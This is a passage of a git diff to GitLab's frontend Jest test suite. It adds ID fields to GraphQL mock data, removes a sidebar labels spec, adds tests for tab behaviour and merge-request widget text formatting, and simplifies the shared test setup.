-318,6 +324,7 @@ export const issuableQueryResponse = { data: { workspace: { __typename: 'Project', + id: '1', issuable: { __typename: 'Issue', id: 'gid://gitlab/Issue/1', @@ -344,6 +351,7 @@ export const searchQueryResponse = { data: { workspace: { __typename: 'Project', + id: '1', users: { nodes: [ { @@ -428,12 +436,15 @@ export const searchResponse = { data: { workspace: { __typename: 'Project', + id: '1', users: { nodes: [ { + id: 'gid://gitlab/User/1', user: mockUser1, }, { + id: 'gid://gitlab/User/4', user: mockUser2, }, ], @@ -445,6 +456,7 @@ export const searchResponse = { export const projectMembersResponse = { data: { workspace: { + id: '1', __typename: 'Project', users: { nodes: [ @@ -452,10 +464,11 @@ export const projectMembersResponse = { null, null, // Remove duplicated entry 
https://gitlab.com/gitlab-org/gitlab/-/issues/327822 - { user: mockUser1 }, - { user: mockUser1 }, - { user: mockUser2 }, + { id: 'user-1', user: mockUser1 }, + { id: 'user-2', user: mockUser1 }, + { id: 'user-3', user: mockUser2 }, { + id: 'user-4', user: { id: 'gid://gitlab/User/2', avatarUrl: @@ -477,16 +490,18 @@ export const projectMembersResponse = { export const groupMembersResponse = { data: { workspace: { - __typename: 'roup', + id: '1', + __typename: 'Group', users: { nodes: [ // Remove nulls https://gitlab.com/gitlab-org/gitlab/-/issues/329750 null, null, // Remove duplicated entry https://gitlab.com/gitlab-org/gitlab/-/issues/327822 - { user: mockUser1 }, - { user: mockUser1 }, + { id: 'user-1', user: mockUser1 }, + { id: 'user-2', user: mockUser1 }, { + id: 'user-3', user: { id: 'gid://gitlab/User/2', avatarUrl: @@ -509,6 +524,7 @@ export const participantsQueryResponse = { data: { workspace: { __typename: 'Project', + id: '1', issuable: { __typename: 'Issue', id: 'gid://gitlab/Issue/1', @@ -578,6 +594,7 @@ export const mockMilestone2 = { export const mockProjectMilestonesResponse = { data: { workspace: { + id: 'gid://gitlab/Project/1', attributes: { nodes: [mockMilestone1, mockMilestone2], }, @@ -663,6 +680,7 @@ export const todosResponse = { data: { workspace: { __typename: 'Group', + id: '1', issuable: { __typename: 'Epic', id: 'gid://gitlab/Epic/4', @@ -681,6 +699,7 @@ export const todosResponse = { export const noTodosResponse = { data: { workspace: { + id: '1', __typename: 'Group', issuable: { __typename: 'Epic', diff --git a/spec/frontend/sidebar/sidebar_labels_spec.js b/spec/frontend/sidebar/sidebar_labels_spec.js deleted file mode 100644 index 8437ee1b723..00000000000 --- a/spec/frontend/sidebar/sidebar_labels_spec.js +++ /dev/null @@ -1,190 +0,0 @@ -import { shallowMount } from '@vue/test-utils'; -import { - mockLabels, - mockRegularLabel, -} from 'jest/vue_shared/components/sidebar/labels_select_vue/mock_data'; -import 
updateIssueLabelsMutation from '~/boards/graphql/issue_set_labels.mutation.graphql'; -import { MutationOperationMode } from '~/graphql_shared/utils'; -import { IssuableType } from '~/issue_show/constants'; -import SidebarLabels from '~/sidebar/components/labels/sidebar_labels.vue'; -import updateMergeRequestLabelsMutation from '~/sidebar/queries/update_merge_request_labels.mutation.graphql'; -import { toLabelGid } from '~/sidebar/utils'; -import { DropdownVariant } from '~/vue_shared/components/sidebar/labels_select_vue/constants'; -import LabelsSelect from '~/vue_shared/components/sidebar/labels_select_vue/labels_select_root.vue'; - -describe('sidebar labels', () => { - let wrapper; - - const defaultProps = { - allowLabelCreate: true, - allowLabelEdit: true, - allowScopedLabels: true, - canEdit: true, - iid: '1', - initiallySelectedLabels: mockLabels, - issuableType: 'issue', - labelsFetchPath: '/gitlab-org/gitlab-test/-/labels.json?include_ancestor_groups=true', - labelsManagePath: '/gitlab-org/gitlab-test/-/labels', - projectIssuesPath: '/gitlab-org/gitlab-test/-/issues', - projectPath: 'gitlab-org/gitlab-test', - fullPath: 'gitlab-org/gitlab-test', - }; - - const $apollo = { - mutate: jest.fn().mockResolvedValue(), - }; - - const userUpdatedLabels = [ - { - ...mockRegularLabel, - set: false, - }, - { - id: 40, - title: 'Security', - color: '#ddd', - text_color: '#fff', - set: true, - }, - { - id: 55, - title: 'Tooling', - color: '#ddd', - text_color: '#fff', - set: false, - }, - ]; - - const findLabelsSelect = () => wrapper.find(LabelsSelect); - - const mountComponent = (props = {}) => { - wrapper = shallowMount(SidebarLabels, { - provide: { - ...defaultProps, - ...props, - }, - mocks: { - $apollo, - }, - }); - }; - - afterEach(() => { - wrapper.destroy(); - wrapper = null; - }); - - describe('LabelsSelect props', () => { - beforeEach(() => { - mountComponent(); - }); - - it('are as expected', () => { - expect(findLabelsSelect().props()).toMatchObject({ - 
allowLabelCreate: defaultProps.allowLabelCreate, - allowLabelEdit: defaultProps.allowLabelEdit, - allowMultiselect: true, - allowScopedLabels: defaultProps.allowScopedLabels, - footerCreateLabelTitle: 'Create project label', - footerManageLabelTitle: 'Manage project labels', - labelsCreateTitle: 'Create project label', - labelsFetchPath: defaultProps.labelsFetchPath, - labelsFilterBasePath: defaultProps.projectIssuesPath, - labelsManagePath: defaultProps.labelsManagePath, - labelsSelectInProgress: false, - selectedLabels: defaultProps.initiallySelectedLabels, - variant: DropdownVariant.Sidebar, - }); - }); - }); - - describe('when type is issue', () => { - beforeEach(() => { - mountComponent({ issuableType: IssuableType.Issue }); - }); - - describe('when labels are updated', () => { - it('invokes a mutation', () => { - findLabelsSelect().vm.$emit('updateSelectedLabels', userUpdatedLabels); - - const expected = { - mutation: updateIssueLabelsMutation, - variables: { - input: { - iid: defaultProps.iid, - projectPath: defaultProps.projectPath, - labelIds: [toLabelGid(29), toLabelGid(28), toLabelGid(27), toLabelGid(40)], - }, - }, - }; - - expect($apollo.mutate).toHaveBeenCalledWith(expected); - }); - }); - - describe('when label `x` is clicked', () => { - it('invokes a mutation', () => { - findLabelsSelect().vm.$emit('onLabelRemove', 27); - - const expected = { - mutation: updateIssueLabelsMutation, - variables: { - input: { - iid: defaultProps.iid, - projectPath: defaultProps.projectPath, - removeLabelIds: [27], - }, - }, - }; - - expect($apollo.mutate).toHaveBeenCalledWith(expected); - }); - }); - }); - - describe('when type is merge_request', () => { - beforeEach(() => { - mountComponent({ issuableType: IssuableType.MergeRequest }); - }); - - describe('when labels are updated', () => { - it('invokes a mutation', () => { - findLabelsSelect().vm.$emit('updateSelectedLabels', userUpdatedLabels); - - const expected = { - mutation: updateMergeRequestLabelsMutation, - 
variables: { - input: { - iid: defaultProps.iid, - labelIds: [toLabelGid(29), toLabelGid(28), toLabelGid(27), toLabelGid(40)], - operationMode: MutationOperationMode.Replace, - projectPath: defaultProps.projectPath, - }, - }, - }; - - expect($apollo.mutate).toHaveBeenCalledWith(expected); - }); - }); - - describe('when label `x` is clicked', () => { - it('invokes a mutation', () => { - findLabelsSelect().vm.$emit('onLabelRemove', 27); - - const expected = { - mutation: updateMergeRequestLabelsMutation, - variables: { - input: { - iid: defaultProps.iid, - labelIds: [toLabelGid(27)], - operationMode: MutationOperationMode.Remove, - projectPath: defaultProps.projectPath, - }, - }, - }; - - expect($apollo.mutate).toHaveBeenCalledWith(expected); - }); - }); - }); -}); diff --git a/spec/frontend/snippets/components/__snapshots__/snippet_visibility_edit_spec.js.snap b/spec/frontend/snippets/components/__snapshots__/snippet_visibility_edit_spec.js.snap index 5df69ffb5f8..f4ebc5c3e3f 100644 --- a/spec/frontend/snippets/components/__snapshots__/snippet_visibility_edit_spec.js.snap +++ b/spec/frontend/snippets/components/__snapshots__/snippet_visibility_edit_spec.js.snap @@ -23,6 +23,7 @@ exports[`Snippet Visibility Edit component rendering matches the snapshot 1`] = class="gl-mb-0" id="visibility-level-setting" labeldescription="" + optionaltext="(optional)" > <gl-form-radio-group-stub checked="private" diff --git a/spec/frontend/snippets/components/edit_spec.js b/spec/frontend/snippets/components/edit_spec.js index 4e88ab9504e..80a8b8ec489 100644 --- a/spec/frontend/snippets/components/edit_spec.js +++ b/spec/frontend/snippets/components/edit_spec.js @@ -53,6 +53,7 @@ const createMutationResponse = (key, obj = {}) => ({ errors: [], snippet: { __typename: 'Snippet', + id: 1, webUrl: TEST_WEB_URL, }, }, diff --git a/spec/frontend/snippets/components/snippet_header_spec.js b/spec/frontend/snippets/components/snippet_header_spec.js index 552a1c6fcde..2d5e0cfd615 100644 --- 
a/spec/frontend/snippets/components/snippet_header_spec.js +++ b/spec/frontend/snippets/components/snippet_header_spec.js @@ -252,7 +252,7 @@ describe('Snippet header component', () => { disabled: false, href: `/foo/-/snippets/new`, text: 'New snippet', - variant: 'success', + variant: 'confirm', }, ]), ); diff --git a/spec/frontend/snippets/test_utils.js b/spec/frontend/snippets/test_utils.js index 8ba5a2fe5dc..dcef8fc9a8b 100644 --- a/spec/frontend/snippets/test_utils.js +++ b/spec/frontend/snippets/test_utils.js @@ -27,6 +27,7 @@ export const createGQLSnippet = () => ({ }, project: { __typename: 'Project', + id: 'project-1', fullPath: 'group/project', webUrl: `${TEST_HOST}/group/project`, }, diff --git a/spec/frontend/tabs/index_spec.js b/spec/frontend/tabs/index_spec.js new file mode 100644 index 00000000000..98617b404ff --- /dev/null +++ b/spec/frontend/tabs/index_spec.js @@ -0,0 +1,260 @@ +import { GlTabsBehavior, TAB_SHOWN_EVENT } from '~/tabs'; +import { ACTIVE_PANEL_CLASS, ACTIVE_TAB_CLASSES } from '~/tabs/constants'; +import { getFixture, setHTMLFixture } from 'helpers/fixtures'; + +const tabsFixture = getFixture('tabs/tabs.html'); + +describe('GlTabsBehavior', () => { + let glTabs; + let tabShownEventSpy; + + const findByTestId = (testId) => document.querySelector(`[data-testid="${testId}"]`); + const findTab = (name) => findByTestId(`${name}-tab`); + const findPanel = (name) => findByTestId(`${name}-panel`); + + const getAttributes = (element) => + Array.from(element.attributes).reduce((acc, attr) => { + acc[attr.name] = attr.value; + return acc; + }, {}); + + const expectActiveTabAndPanel = (name) => { + const tab = findTab(name); + const panel = findPanel(name); + + expect(glTabs.activeTab).toBe(tab); + + expect(getAttributes(tab)).toMatchObject({ + 'aria-controls': panel.id, + 'aria-selected': 'true', + role: 'tab', + id: expect.any(String), + }); + + ACTIVE_TAB_CLASSES.forEach((klass) => { + expect(tab.classList.contains(klass)).toBe(true); + }); + 
+ expect(getAttributes(panel)).toMatchObject({ + 'aria-labelledby': tab.id, + role: 'tabpanel', + }); + + expect(panel.classList.contains(ACTIVE_PANEL_CLASS)).toBe(true); + }; + + const expectInactiveTabAndPanel = (name) => { + const tab = findTab(name); + const panel = findPanel(name); + + expect(glTabs.activeTab).not.toBe(tab); + + expect(getAttributes(tab)).toMatchObject({ + 'aria-controls': panel.id, + 'aria-selected': 'false', + role: 'tab', + tabindex: '-1', + id: expect.any(String), + }); + + ACTIVE_TAB_CLASSES.forEach((klass) => { + expect(tab.classList.contains(klass)).toBe(false); + }); + + expect(getAttributes(panel)).toMatchObject({ + 'aria-labelledby': tab.id, + role: 'tabpanel', + }); + + expect(panel.classList.contains(ACTIVE_PANEL_CLASS)).toBe(false); + }; + + const expectGlTabShownEvent = (name) => { + expect(tabShownEventSpy).toHaveBeenCalledTimes(1); + + const [event] = tabShownEventSpy.mock.calls[0]; + expect(event.target).toBe(findTab(name)); + + expect(event.detail).toEqual({ + activeTabPanel: findPanel(name), + }); + }; + + const triggerKeyDown = (code, element) => { + const event = new KeyboardEvent('keydown', { code }); + + element.dispatchEvent(event); + }; + + it('throws when instantiated without an element', () => { + expect(() => new GlTabsBehavior()).toThrow('Cannot instantiate'); + }); + + describe('when given an element', () => { + afterEach(() => { + glTabs.destroy(); + }); + + beforeEach(() => { + setHTMLFixture(tabsFixture); + + const tabsEl = findByTestId('tabs'); + tabShownEventSpy = jest.fn(); + tabsEl.addEventListener(TAB_SHOWN_EVENT, tabShownEventSpy); + + glTabs = new GlTabsBehavior(tabsEl); + }); + + it('instantiates', () => { + expect(glTabs).toEqual(expect.any(GlTabsBehavior)); + }); + + it('sets the active tab', () => { + expectActiveTabAndPanel('foo'); + }); + + it(`does not fire an initial ${TAB_SHOWN_EVENT} event`, () => { + expect(tabShownEventSpy).not.toHaveBeenCalled(); + }); + + describe('clicking on an inactive 
tab', () => { + beforeEach(() => { + findTab('bar').click(); + }); + + it('changes the active tab', () => { + expectActiveTabAndPanel('bar'); + }); + + it('deactivates the previously active tab', () => { + expectInactiveTabAndPanel('foo'); + }); + + it(`dispatches a ${TAB_SHOWN_EVENT} event`, () => { + expectGlTabShownEvent('bar'); + }); + }); + + describe('clicking on the active tab', () => { + beforeEach(() => { + findTab('foo').click(); + }); + + it('does nothing', () => { + expectActiveTabAndPanel('foo'); + expect(tabShownEventSpy).not.toHaveBeenCalled(); + }); + }); + + describe('keyboard navigation', () => { + it.each(['ArrowRight', 'ArrowDown'])('pressing %s moves to next tab', (code) => { + expectActiveTabAndPanel('foo'); + + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('bar'); + expectInactiveTabAndPanel('foo'); + expectGlTabShownEvent('bar'); + tabShownEventSpy.mockClear(); + + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('qux'); + expectInactiveTabAndPanel('bar'); + expectGlTabShownEvent('qux'); + tabShownEventSpy.mockClear(); + + // We're now on the last tab, so the active tab should not change + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('qux'); + expect(tabShownEventSpy).not.toHaveBeenCalled(); + }); + + it.each(['ArrowLeft', 'ArrowUp'])('pressing %s moves to previous tab', (code) => { + // First, make the last tab active + findTab('qux').click(); + tabShownEventSpy.mockClear(); + + // Now start moving backwards + expectActiveTabAndPanel('qux'); + + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('bar'); + expectInactiveTabAndPanel('qux'); + expectGlTabShownEvent('bar'); + tabShownEventSpy.mockClear(); + + triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('foo'); + expectInactiveTabAndPanel('bar'); + expectGlTabShownEvent('foo'); + tabShownEventSpy.mockClear(); + + // We're now on the first tab, so the active tab should not change + 
triggerKeyDown(code, glTabs.activeTab); + + expectActiveTabAndPanel('foo'); + expect(tabShownEventSpy).not.toHaveBeenCalled(); + }); + }); + + describe('destroying', () => { + beforeEach(() => { + glTabs.destroy(); + }); + + it('removes interactivity', () => { + const inactiveTab = findTab('bar'); + + // clicks do nothing + inactiveTab.click(); + expectActiveTabAndPanel('foo'); + expect(tabShownEventSpy).not.toHaveBeenCalled(); + + // keydown events do nothing + triggerKeyDown('ArrowDown', inactiveTab); + expectActiveTabAndPanel('foo'); + expect(tabShownEventSpy).not.toHaveBeenCalled(); + }); + }); + + describe('activateTab method', () => { + it.each` + tabState | name + ${'active'} | ${'foo'} + ${'inactive'} | ${'bar'} + `('can programmatically activate an $tabState tab', ({ name }) => { + glTabs.activateTab(findTab(name)); + expectActiveTabAndPanel(name); + expectGlTabShownEvent(name, 'foo'); + }); + }); + }); + + describe('using aria-controls instead of href to link tabs to panels', () => { + beforeEach(() => { + setHTMLFixture(tabsFixture); + + const tabsEl = findByTestId('tabs'); + ['foo', 'bar', 'qux'].forEach((name) => { + const tab = findTab(name); + const panel = findPanel(name); + + tab.setAttribute('href', '#'); + tab.setAttribute('aria-controls', panel.id); + }); + + glTabs = new GlTabsBehavior(tabsEl); + }); + + it('connects the panels to their tabs correctly', () => { + findTab('bar').click(); + + expectActiveTabAndPanel('bar'); + expectInactiveTabAndPanel('foo'); + }); + }); +}); diff --git a/spec/frontend/terraform/components/terraform_list_spec.js b/spec/frontend/terraform/components/terraform_list_spec.js index c622f86072d..8e565df81ae 100644 --- a/spec/frontend/terraform/components/terraform_list_spec.js +++ b/spec/frontend/terraform/components/terraform_list_spec.js @@ -23,6 +23,7 @@ describe('TerraformList', () => { const apolloQueryResponse = { data: { project: { + id: '1', terraformStates, }, }, diff --git a/spec/frontend/test_setup.js 
b/spec/frontend/test_setup.js index 40f68c6385f..4fe51db8412 100644 --- a/spec/frontend/test_setup.js +++ b/spec/frontend/test_setup.js @@ -1,30 +1,10 @@ -import { config as testUtilsConfig } from '@vue/test-utils'; -import * as jqueryMatchers from 'custom-jquery-matchers'; -import Vue from 'vue'; -import 'jquery'; -import { setGlobalDateToFakeDate } from 'helpers/fake_date'; -import setWindowLocation from 'helpers/set_window_location_helper'; -import { TEST_HOST } from 'helpers/test_constants'; -import Translate from '~/vue_shared/translate'; -import { loadHTMLFixture, setHTMLFixture } from './__helpers__/fixtures'; -import { initializeTestTimeout } from './__helpers__/timeout'; -import customMatchers from './matchers'; -import { setupManualMocks } from './mocks/mocks_helper'; +/* Setup for unit test environment */ +import 'helpers/shared_test_setup'; +import { initializeTestTimeout } from 'helpers/timeout'; -import './__helpers__/dom_shims'; -import './__helpers__/jquery'; -import '~/commons/bootstrap'; +jest.mock('~/lib/utils/axios_utils', () => jest.requireActual('helpers/mocks/axios_utils')); -// This module has some fairly decent visual test coverage in it's own repository. -jest.mock('@gitlab/favicon-overlay'); - -process.on('unhandledRejection', global.promiseRejectionHandler); - -setupManualMocks(); - -// Fake the `Date` for the rest of the jest spec runtime environment. -// https://gitlab.com/gitlab-org/gitlab/-/merge_requests/39496#note_503084332 -setGlobalDateToFakeDate(); +initializeTestTimeout(process.env.CI ? 6000 : 500); afterEach(() => // give Promises a bit more time so they fail the right test @@ -33,71 +13,3 @@ afterEach(() => jest.runOnlyPendingTimers(); }), ); - -initializeTestTimeout(process.env.CI ? 
6000 : 500); - -Vue.config.devtools = false; -Vue.config.productionTip = false; - -Vue.use(Translate); - -// convenience wrapper for migration from Karma -Object.assign(global, { - loadFixtures: loadHTMLFixture, - setFixtures: setHTMLFixture, -}); - -const JQUERY_MATCHERS_TO_EXCLUDE = ['toHaveLength', 'toExist']; - -// custom-jquery-matchers was written for an old Jest version, we need to make it compatible -Object.entries(jqueryMatchers).forEach(([matcherName, matcherFactory]) => { - // Exclude these jQuery matchers - if (JQUERY_MATCHERS_TO_EXCLUDE.includes(matcherName)) { - return; - } - - expect.extend({ - [matcherName]: matcherFactory().compare, - }); -}); - -expect.extend(customMatchers); - -testUtilsConfig.deprecationWarningHandler = (method, message) => { - const ALLOWED_DEPRECATED_METHODS = [ - // https://gitlab.com/gitlab-org/gitlab/-/issues/295679 - 'finding components with `find` or `get`', - - // https://gitlab.com/gitlab-org/gitlab/-/issues/295680 - 'finding components with `findAll`', - ]; - if (!ALLOWED_DEPRECATED_METHODS.includes(method)) { - global.console.error(message); - } -}; - -Object.assign(global, { - requestIdleCallback(cb) { - const start = Date.now(); - return setTimeout(() => { - cb({ - didTimeout: false, - timeRemaining: () => Math.max(0, 50 - (Date.now() - start)), - }); - }); - }, - cancelIdleCallback(id) { - clearTimeout(id); - }, -}); - -beforeEach(() => { - // make sure that each test actually tests something - // see https://jestjs.io/docs/en/expect#expecthasassertions - expect.hasAssertions(); - - // Reset the mocked window.location. This ensures tests don't interfere with - // each other, and removes the need to tidy up if it was changed for a given - // test. 
- setWindowLocation(TEST_HOST); -}); diff --git a/spec/frontend/token_access/mock_data.js b/spec/frontend/token_access/mock_data.js index 14d7b00cb6d..0f121fd1beb 100644 --- a/spec/frontend/token_access/mock_data.js +++ b/spec/frontend/token_access/mock_data.js @@ -1,6 +1,7 @@ export const enabledJobTokenScope = { data: { project: { + id: '1', ciCdSettings: { jobTokenScopeEnabled: true, __typename: 'ProjectCiCdSetting', @@ -13,6 +14,7 @@ export const enabledJobTokenScope = { export const disabledJobTokenScope = { data: { project: { + id: '1', ciCdSettings: { jobTokenScopeEnabled: false, __typename: 'ProjectCiCdSetting', @@ -39,12 +41,14 @@ export const projectsWithScope = { data: { project: { __typename: 'Project', + id: '1', ciJobTokenScope: { __typename: 'CiJobTokenScopeType', projects: { __typename: 'ProjectConnection', nodes: [ { + id: '2', fullPath: 'root/332268-test', name: 'root/332268-test', }, @@ -75,10 +79,17 @@ export const removeProjectSuccess = { export const mockProjects = [ { + id: '1', name: 'merge-train-stuff', fullPath: 'root/merge-train-stuff', isLocked: false, __typename: 'Project', }, - { name: 'ci-project', fullPath: 'root/ci-project', isLocked: true, __typename: 'Project' }, + { + id: '2', + name: 'ci-project', + fullPath: 'root/ci-project', + isLocked: true, + __typename: 'Project', + }, ]; diff --git a/spec/frontend/transfer_edit_spec.js b/spec/frontend/transfer_edit_spec.js index ad8c9c68f37..4091d753fe5 100644 --- a/spec/frontend/transfer_edit_spec.js +++ b/spec/frontend/transfer_edit_spec.js @@ -4,11 +4,11 @@ import { loadHTMLFixture } from 'helpers/fixtures'; import setupTransferEdit from '~/transfer_edit'; describe('setupTransferEdit', () => { - const formSelector = '.js-project-transfer-form'; - const targetSelector = 'select.select2'; + const formSelector = '.js-group-transfer-form'; + const targetSelector = '#new_parent_group_id'; beforeEach(() => { - loadHTMLFixture('projects/edit.html'); + loadHTMLFixture('groups/edit.html'); 
setupTransferEdit(formSelector, targetSelector); }); @@ -17,8 +17,8 @@ describe('setupTransferEdit', () => { }); it('enables submit button when selection changes to non-empty value', () => { - const nonEmptyValue = $(formSelector).find(targetSelector).find('option').not(':empty').val(); - $(formSelector).find(targetSelector).val(nonEmptyValue).trigger('change'); + const lastValue = $(formSelector).find(targetSelector).find('.dropdown-content li').last(); + $(formSelector).find(targetSelector).val(lastValue).trigger('change'); expect($(formSelector).find(':submit').prop('disabled')).toBeFalsy(); }); diff --git a/spec/frontend/vue_mr_widget/components/extensions/utils_spec.js b/spec/frontend/vue_mr_widget/components/extensions/utils_spec.js new file mode 100644 index 00000000000..64e802c4fa5 --- /dev/null +++ b/spec/frontend/vue_mr_widget/components/extensions/utils_spec.js @@ -0,0 +1,18 @@ +import { generateText } from '~/vue_merge_request_widget/components/extensions/utils'; + +describe('generateText', () => { + it.each` + text | expectedText + ${'%{strong_start}Hello world%{strong_end}'} | ${'<span class="gl-font-weight-bold">Hello world</span>'} + ${'%{success_start}Hello world%{success_end}'} | ${'<span class="gl-font-weight-bold gl-text-green-500">Hello world</span>'} + ${'%{danger_start}Hello world%{danger_end}'} | ${'<span class="gl-font-weight-bold gl-text-red-500">Hello world</span>'} + ${'%{critical_start}Hello world%{critical_end}'} | ${'<span class="gl-font-weight-bold gl-text-red-800">Hello world</span>'} + ${'%{same_start}Hello world%{same_end}'} | ${'<span class="gl-font-weight-bold gl-text-gray-700">Hello world</span>'} + ${'%{small_start}Hello world%{small_end}'} | ${'<span class="gl-font-sm">Hello world</span>'} + ${'%{strong_start}%{danger_start}Hello world%{danger_end}%{strong_end}'} | ${'<span class="gl-font-weight-bold"><span class="gl-font-weight-bold gl-text-red-500">Hello world</span></span>'} + ${'%{no_exist_start}Hello 
world%{no_exist_end}'} | ${'Hello world'} + ${['array']} | ${null} + `('generates $expectedText from $text', ({ text, expectedText }) => { + expect(generateText(text)).toBe(expectedText); + }); +}); diff --git a/spec/frontend/vue_mr_widget/components/states/commit_edit_spec.js b/spec/frontend/vue_mr_widget/components/states/commit_edit_spec.js index f965fc32dc1..c30f6f1dfd1 100644 --- a/spec/frontend/vue_mr_widget/components/states/commit_edit_spec.js +++ b/spec/frontend/vue_mr_widget/components/states/commit_edit_spec.js @@ -3,7 +3,6 @@ import CommitEdit from '~/vue_merge_request_widget/components/states/commit_edit const testCommitMessage = 'Test commit message'; const testLabel = 'Test label'; -const testTextMuted = 'Test text muted'; const testInputId = 'test-input-id'; describe('Commits edit component', () => { @@ -64,7 +63,6 @@ describe('Commits edit component', () => { beforeEach(() => { createComponent({ header: `<div class="test-header">${testCommitMessage}</div>`, - 'text-muted': `<p class="test-text-muted">${testTextMuted}</p>`, }); }); @@ -74,12 +72,5 @@ describe('Commits edit component', () => { expect(headerSlotElement.exists()).toBe(true); expect(headerSlotElement.text()).toBe(testCommitMessage); }); - - it('renders text-muted slot correctly', () => { - const textMutedElement = wrapper.find('.test-text-muted'); - - expect(textMutedElement.exists()).toBe(true); - expect(textMutedElement.text()).toBe(testTextMuted); - }); }); }); diff --git a/spec/frontend/vue_mr_widget/components/states/mr_widget_archived_spec.js b/spec/frontend/vue_mr_widget/components/states/mr_widget_archived_spec.js index 4bdc6c95f22..f3061d792d0 100644 --- a/spec/frontend/vue_mr_widget/components/states/mr_widget_archived_spec.js +++ b/spec/frontend/vue_mr_widget/components/states/mr_widget_archived_spec.js @@ -25,7 +25,7 @@ describe('MRWidgetArchived', () => { it('renders information', () => { expect(vm.$el.querySelector('.bold').textContent.trim()).toEqual( - 'This project is 
archived, write access has been disabled', + 'Merge unavailable: merge requests are read-only on archived projects.', ); }); }); diff --git a/spec/frontend/vue_mr_widget/components/states/mr_widget_conflicts_spec.js b/spec/frontend/vue_mr_widget/components/states/mr_widget_conflicts_spec.js index e1bce7f0474..89de160b02f 100644 --- a/spec/frontend/vue_mr_widget/components/states/mr_widget_conflicts_spec.js +++ b/spec/frontend/vue_mr_widget/components/states/mr_widget_conflicts_spec.js @@ -12,6 +12,14 @@ describe('MRWidgetConflicts', () => { const findResolveButton = () => wrapper.findByTestId('resolve-conflicts-button'); const findMergeLocalButton = () => wrapper.findByTestId('merge-locally-button'); + const mergeConflictsText = 'Merge blocked: merge conflicts must be resolved.'; + const fastForwardMergeText = + 'Merge blocked: fast-forward merge is not possible. To merge this request, first rebase locally.'; + const userCannotMergeText = + 'Users who can write to the source or target branches can resolve the conflicts.'; + const resolveConflictsBtnText = 'Resolve conflicts'; + const mergeLocallyBtnText = 'Merge locally'; + function createComponent(propsData = {}) { wrapper = extendedWrapper( shallowMount(ConflictsComponent, { @@ -81,16 +89,16 @@ describe('MRWidgetConflicts', () => { }); it('should tell you about conflicts without bothering other people', () => { - expect(wrapper.text()).toContain('There are merge conflicts'); - expect(wrapper.text()).not.toContain('ask someone with write access'); + expect(wrapper.text()).toContain(mergeConflictsText); + expect(wrapper.text()).not.toContain(userCannotMergeText); }); it('should not allow you to resolve the conflicts', () => { - expect(wrapper.text()).not.toContain('Resolve conflicts'); + expect(wrapper.text()).not.toContain(resolveConflictsBtnText); }); it('should have merge buttons', () => { - expect(findMergeLocalButton().text()).toContain('Merge locally'); + 
expect(findMergeLocalButton().text()).toContain(mergeLocallyBtnText); }); }); @@ -107,17 +115,17 @@ describe('MRWidgetConflicts', () => { }); it('should tell you about conflicts', () => { - expect(wrapper.text()).toContain('There are merge conflicts'); - expect(wrapper.text()).toContain('ask someone with write access'); + expect(wrapper.text()).toContain(mergeConflictsText); + expect(wrapper.text()).toContain(userCannotMergeText); }); it('should allow you to resolve the conflicts', () => { - expect(findResolveButton().text()).toContain('Resolve conflicts'); + expect(findResolveButton().text()).toContain(resolveConflictsBtnText); expect(findResolveButton().attributes('href')).toEqual(path); }); it('should not have merge buttons', () => { - expect(wrapper.text()).not.toContain('Merge locally'); + expect(wrapper.text()).not.toContain(mergeLocallyBtnText); }); }); @@ -134,17 +142,17 @@ describe('MRWidgetConflicts', () => { }); it('should tell you about conflicts without bothering other people', () => { - expect(wrapper.text()).toContain('There are merge conflicts'); - expect(wrapper.text()).not.toContain('ask someone with write access'); + expect(wrapper.text()).toContain(mergeConflictsText); + expect(wrapper.text()).not.toContain(userCannotMergeText); }); it('should allow you to resolve the conflicts', () => { - expect(findResolveButton().text()).toContain('Resolve conflicts'); + expect(findResolveButton().text()).toContain(resolveConflictsBtnText); expect(findResolveButton().attributes('href')).toEqual(path); }); it('should have merge buttons', () => { - expect(findMergeLocalButton().text()).toContain('Merge locally'); + expect(findMergeLocalButton().text()).toContain(mergeLocallyBtnText); }); }); @@ -158,9 +166,7 @@ describe('MRWidgetConflicts', () => { }, }); - expect(wrapper.text().trim().replace(/\s\s+/g, ' ')).toContain( - 'ask someone with write access', - ); + expect(wrapper.text().trim().replace(/\s\s+/g, ' ')).toContain(userCannotMergeText); }); it('should 
not have action buttons', async () => { @@ -198,9 +204,7 @@ describe('MRWidgetConflicts', () => { }, }); - expect(removeBreakLine(wrapper.text()).trim()).toContain( - 'Merge blocked: fast-forward merge is not possible. To merge this request, first rebase locally.', - ); + expect(removeBreakLine(wrapper.text()).trim()).toContain(fastForwardMergeText); }); }); @@ -236,7 +240,7 @@ describe('MRWidgetConflicts', () => { }); it('should allow you to resolve the conflicts', () => { - expect(findResolveButton().text()).toContain('Resolve conflicts'); + expect(findResolveButton().text()).toContain(resolveConflictsBtnText); expect(findResolveButton().attributes('href')).toEqual(TEST_HOST); }); }); diff --git a/spec/frontend/vue_mr_widget/components/states/mr_widget_ready_to_merge_spec.js b/spec/frontend/vue_mr_widget/components/states/mr_widget_ready_to_merge_spec.js index 016b6b2220b..7082a19a8e7 100644 --- a/spec/frontend/vue_mr_widget/components/states/mr_widget_ready_to_merge_spec.js +++ b/spec/frontend/vue_mr_widget/components/states/mr_widget_ready_to_merge_spec.js @@ -1,5 +1,6 @@ import { shallowMount } from '@vue/test-utils'; import Vue from 'vue'; +import { GlSprintf } from '@gitlab/ui'; import simplePoll from '~/lib/utils/simple_poll'; import CommitEdit from '~/vue_merge_request_widget/components/states/commit_edit.vue'; import CommitMessageDropdown from '~/vue_merge_request_widget/components/states/commit_message_dropdown.vue'; @@ -487,6 +488,7 @@ describe('ReadyToMerge', () => { const findCommitEditElements = () => wrapper.findAll(CommitEdit); const findCommitDropdownElement = () => wrapper.find(CommitMessageDropdown); const findFirstCommitEditLabel = () => findCommitEditElements().at(0).props('label'); + const findTipLink = () => wrapper.find(GlSprintf); describe('squash checkbox', () => { it('should be rendered when squash before merge is enabled and there is more than 1 commit', () => { @@ -503,10 +505,10 @@ describe('ReadyToMerge', () => { 
